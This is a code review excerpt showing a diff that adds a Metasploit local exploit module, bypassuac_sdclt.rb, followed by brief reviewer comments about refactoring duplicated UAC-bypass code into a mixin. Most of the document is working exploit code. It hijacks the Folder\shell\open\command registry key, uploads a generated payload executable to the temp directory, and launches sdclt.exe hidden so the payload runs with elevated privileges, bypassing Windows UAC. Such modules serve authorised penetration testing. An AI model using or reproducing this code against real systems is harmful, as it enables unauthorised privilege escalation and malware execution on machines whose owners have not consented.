modules/exploits/windows/local/bypassuac_sdclt.rb

```diff
@@ -0,0 +1,165 @@
+
+  def write_reg_values(registry_key, payload_pathname)
+    begin
+      registry_createkey(registry_key) unless registry_key_exist?(registry_key)
+      registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ")
+      registry_setvaldata(registry_key, '', payload_pathname, "REG_SZ")
+    rescue ::Exception => e
+      print_error(e.to_s)
+    end
+  end
+
+  def exploit
+    check_permissions!
+    case get_uac_level
+    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+      fail_with(Failure::NotVulnerable,
+                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
+    when UAC_DEFAULT
+      print_good('UAC is set to Default')
+      print_good('BypassUAC can bypass this setting, continuing...')
+    when UAC_NO_PROMPT
+      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+      shell_execute_exe
+      return
+    end
+
+    registry_key = 'HKCU\Software\Classes\Folder\shell\open\command'
+    remove_registry_key = !registry_key_exist?(registry_key)
+
+    # get directory locations straight
+    win_dir = session.sys.config.getenv('windir')
+    vprint_status("win_dir = " + win_dir)
+    tmp_dir = session.sys.config.getenv('tmp')
+    vprint_status("tmp_dir = " + tmp_dir)
+    exploit_dir = win_dir + "\\System32\\"
+    vprint_status("exploit_dir = " + exploit_dir)
+    target_filepath = exploit_dir + "sdclt.exe"
+    vprint_status("exploit_file = " + target_filepath)
+
+    # make payload
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14) + '.exe'
+    payload_pathname = tmp_dir + '\\' + payload_name
+    vprint_status("payload_pathname = " + payload_pathname)
+    vprint_status("Making Payload")
+    payload = generate_payload_exe
+    reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
+    vprint_status("reg_command = " + reg_command)
+    write_reg_values(registry_key, reg_command)
+
+    # Upload payload
+    vprint_status("Uploading Payload to #{payload_pathname}")
+    write_file(payload_pathname, payload)
+    vprint_status("Payload Upload Complete")
+
+    vprint_status("Launching " + target_filepath)
+    begin
+      session.sys.process.execute("cmd.exe /c \"#{target_filepath}\"", nil, 'Hidden' => true)
+    rescue ::Exception => e
+      print_error("Executing command failed:\n#{e}")
+    end
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
+    # wait for a few seconds before cleaning up
+    print_status("Please wait for session and cleanup....")
+    sleep(20)
+    vprint_status("Removing Registry Changes")
+    if remove_registry_key
+      registry_deletekey(registry_key)
+    else
+      registry_deleteval(registry_key, "DelegateExecute")
+      registry_deleteval(registry_key, '')
+    end
+    print_status("Registry Changes Removed")
+  end
+
+  def check_permissions!
```

Comment:
We should consider moving this function to a mixin at some point, it seems to be duplicated

Reply:
Much of the UAC bypass code is. At least a mixin, and then that unified module we all keep talking about.

Reply:
Since it's duplicated in so many places I think it would make sense to land this as is and refactor in a separate pull request